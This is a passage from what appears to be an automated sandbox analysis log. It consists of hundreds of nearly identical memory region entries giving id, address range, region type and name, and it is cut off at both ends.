0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9098 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9099 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9100 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9101 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9102 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9103 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9104 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9105 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9107 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9108 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9109 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9111 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9112 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9113 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9114 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9115 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9116 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9117 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9118 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9119 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9120 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9121 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9122 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9123 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9124 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9125 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9126 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9127 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9128 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9129 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9131 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9132 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9133 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9134 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9135 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9136 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9137 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9138 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9139 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9140 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9141 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9142 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9143 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9144 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9145 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 9146 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9147 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9148 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9149 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9150 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9151 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9152 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9153 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9154 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9155 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9156 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9157 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9158 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9159 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9160 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9161 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9162 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9163 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9164 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9165 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9166 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9167 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9168 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9169 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9170 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9171 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9172 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9173 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9174 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9175 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9176 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9177 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9178 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9179 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9180 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9181 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9182 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9183 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9184 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9185 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9186 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9187 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9188 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9189 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9190 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9191 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9192 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9193 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9194 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9195 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9196 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9197 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9198 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9199 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9200 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9201 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9202 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9203 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9204 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9205 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9206 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9207 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9208 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9209 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9210 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9211 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9212 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9213 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9214 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9215 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9216 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9217 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9218 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9219 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9220 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9221 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9222 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9223 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9224 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9225 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9226 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9227 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9228 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9229 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9230 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9231 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9232 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9233 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9234 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9235 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9236 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9237 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9238 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9239 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9240 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9241 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9242 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9243 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9244 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9245 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9246 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9247 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9248 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9249 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9250 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9251 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9252 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9253 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 9254 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 9255 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9256 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9257 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9258 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9259 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9260 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9261 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9262 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9263 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9264 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9265 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9266 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9267 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9268 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9269 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9270 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9271 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9272 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9273 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9274 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9275 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9276 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9277 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9278 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9279 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9280 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9281 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9282 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9283 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9284 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9285 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9286 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 9287 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 